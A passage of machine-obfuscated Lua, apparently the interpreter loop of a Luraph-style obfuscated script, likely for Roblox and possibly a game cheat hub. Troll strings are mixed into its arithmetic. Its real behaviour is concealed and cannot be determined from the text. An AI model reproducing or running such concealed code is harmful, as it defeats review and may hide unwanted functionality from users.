_l_;__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][__[_[___l_]]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[_llll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[__ll]]]=__[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[___ll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[__ll]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]][__[_[___ll]]]=__[_[__ll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]][__[_[_llll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[__ll]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[_llll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];break end;break;end break;end while(_l_)/((-0x1e+2988))==776 do _l_=(1990371)while(-0x5f+123)>=__l_l do _l_-= _l_ _l_=(399432)while __l_l>(0x71-86)do _l_-= _l_ local _l_;_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[_l_ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];break end while 356==(_l_)/((0x905-1187))do local ___;local _l_;_l_=_[_ll_l]__[_l_](_l_l(__,_l_+_l__l,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l];___=__[_[__lll]];__[_l_+1]=___;__[_l_]=___[__[_[_l_l_]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=(_[_l_ll]~=0);break end;break;end while 503==(_l_)/((0x1f5d-4072))do _l_=(2455816)while(-#"guys im from the future v6 will completely hide your script by returning empty file"+(336-0xe0))<__l_l do _l_-= _l_ local ___;local _l_;__[_[_lll]]=_____[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__ll]][_[___l_]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_l_ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[___l]]=__[_[_llll]][_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_];___=__[_[_l_ll]];__[_l_+1]=___;__[_l_]=___[_[_lll_]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];do return end;break end while 3784==(_l_)/((27907/0x2b))do local _l_;local _l_l;__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_l=_[___ll];_l_=__[_l_l]for _=_l_l+1,_[_lll_]do _l_=_l_..__[_];end;__[_[_ll_]]=_l_;_l=_l+_ll;_=__l[_l];if not __[_[___]]then _l=_l+_l__l;else _l=_[____];end;break end;break;end break;end break;end break;end break;end while(_l_)/((-0x15+2142))==2469 do _l_=(3444999)while(-#'troll'+(0x25e4/194))>=__l_l do _l_-= _l_ _l_=(2411535)while(-#'LOL ur gonna fail probs'+(243-0xb7))>=__l_l do _l_-= _l_ _l_=(3450694)while __l_l<=(0xa0+-127)do _l_-= _l_ _l_=(2257605)while((0x1fa0/88)+-#[[why cant i use localplayer on server scripts pls help im noob]])>=__l_l do _l_-= _l_ local _l_;_l_=_[___l]__[_l_]=__[_l_]()_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];if(__[_[___]]~=__[_[_l_l_]])then _l=_l+_l__l;else _l=_[__lll];end;break;end while 2389==(_l_)/((-0x39+1002))do _l_=(9215900)while((120+-0x2d)+-#[[hank hub, more like wank hum xdxdxd, shutup]])<__l_l do _l_-= _l_ local _l=_[_l__];local _=_[____];for _=_l,_ do __[_]=__llll[_-_l];end;break end while 2348==(_l_)/((-#'somebody play minecraft with lerebox please hes so lonely'+(0xf30ac/250)))do __[_[_ll_]]=__[_[__lll]]*__[_[_lll_]];break end;break;end break;end while(_l_)/((-#[[You know c#? What does << operator do?]]+(0x560+-80)))==2743 do _l_=(5938205)while __l_l<=(7980/0xe4)do _l_-= _l_ _l_=(3223584)while((0x295ce/33)/0x97)<__l_l do _l_-= _l_ local _l_;__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[____]]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];__[_[___]][__[_[_llll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[___ll]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[_l__]][__[_[__lll]]]=__[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]][__[_[____]]]=__[_[_lll_]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[____];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[_ll_l]][__[_[___ll]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[____]))_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[_llll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_lll]][__[_[_l_ll]]]=__[_[__l__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[__lll];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[___l]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))break end while 861==(_l_)/((299520/0x50))do __[_[_ll_l]]=___lll(_l__ll[_[__lll]],nil,__l_);break end;break;end while(_l_)/(((161823/0x39)+-#'paster haha paster'))==2105 do _l_=(969210)while(-#'Oh so you constant dumped the script? Ladies and gentleman we got genius there'+(-43+0x9d))<__l_l do _l_-= _l_ local _ll=_[_l_ll];local _l=__[_ll]for _=_ll+1,_[_ll__]do _l=_l..__[_];end;__[_[_ll_l]]=_l;break end while 267==(_l_)/((0xe74+-70))do _l=_[_llll];break end;break;end break;end break;end while 4053==(_l_)/(((0x29040/250)+-0x4d))do _l_=(815122)while __l_l<=(-#"moons.ec/purchase"+(9570/0xa5))do _l_-= _l_ _l_=(2276780)while(0x88-97)>=__l_l do _l_-= _l_ _l_=(10900593)while __l_l>((232-0xa4)+-#"totally obfuscated with luraph")do _l_-= _l_ local __l_l;local _l_;__[_[_ll_l]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];_l_=_[___];__l_l=__[_[___ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[___]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___]]=_[_l_ll];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_l_ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__lll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__ll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__ll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__lll]][_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[____]][_[_ll__]];_l=_l+_ll;_=__l[_l];_l_=_[_lll]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[__ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[_ll__]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];_l_=_[_l__];__l_l=__[_[_l_ll]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_l__]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_llll]))_l=_l+_ll;_=__l[_l];__[_[___]]=__l_[_[___ll]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[__ll];_l=_l+_ll;_=__l[_l];__[_[___l]]=_[_llll];_l=_l+_ll;_=__l[_l];__[_[_ll_l]]=_[___ll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];__[_[_ll_]]=__[_[__ll]][__[_[__l__]]];_l=_l+_ll;_=__l[_l];__[_[_l__]]=__[_[__lll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[___]]=__[_[__ll]][_[_l_l_]];_l=_l+_ll;_=__l[_l];__[_[_lll]]=__[_[__lll]];_l=_l+_ll;_=__l[_l];__[_[_lll]]={};_l=_l+_ll;_=__l[_l];__[_[_lll]][_[_l_ll]]=__[_[_l_l_]];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[_ll_];__l_l=__[_[____]];__[_l_+1]=__l_l;__[_l_]=__l_l[_[___l_]];_l=_l+_ll;_=__l[_l];_l_=_[___]__[_l_](__[_l_+_l__l])_l=_l+_ll;_=__l[_l];do return end;break end while(_l_)/((0x653d6/122))==3207 do local _l_;__[_[_ll_l]]=__l_[_[____]];_l=_l+_ll;_=__l[_l];__[_[_ll_]]=_[____];_l=_l+_ll;_=__l[_l];__[_[_lll]]=_[___ll];_l=_l+_ll;_=__l[_l];__[_[_l__]]=_[_llll];_l=_l+_ll;_=__l[_l];_l_=_[_ll_l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[_l_ll]))_l=_l+_ll;_=__l[_l];_l_=_[___l]__[_l_]=__[_l_](_l_l(__,_l_+_ll,_[___ll]))_l=_l+_ll;_=__l[_l];if __[_[_l__]]then _l=_l+_ll;else _l=_[___ll];end;break end;break;end while 790==(_l_)/((-#'alt + f4 to open up the deobfuscated source code'+(501030/(-#'Federal was here...'+(-89+0x117)))))do _l_=(3308480)while((9810+-0x5a)/243)<__l_l do _l_-= _l_ __[_[_l__]][_[___ll]]=__[_[___l_]];break end while 1960==(_l_)/((-#[[I am albanian obfuscator I cannot hide this script please dont view it]]+(0x69954/246)))do local _l=_[___]local _l_={__[_l](__[_l+1])};local __l=0;for _=_l,_[___l_]do __l=__l+_ll;__[_]=_l_[__l];end break end;break;end break;end while 1738==(_l_)/((0x40a-565))do _l_=(9246864)while(153-0x6e)>=__l_l do _l_-= _l_ _l_=(223479)while((19505/0xeb)+-#"this challenge was brought to you by bmcq")<__l_l do _l_-= _l_ local _ll_;local 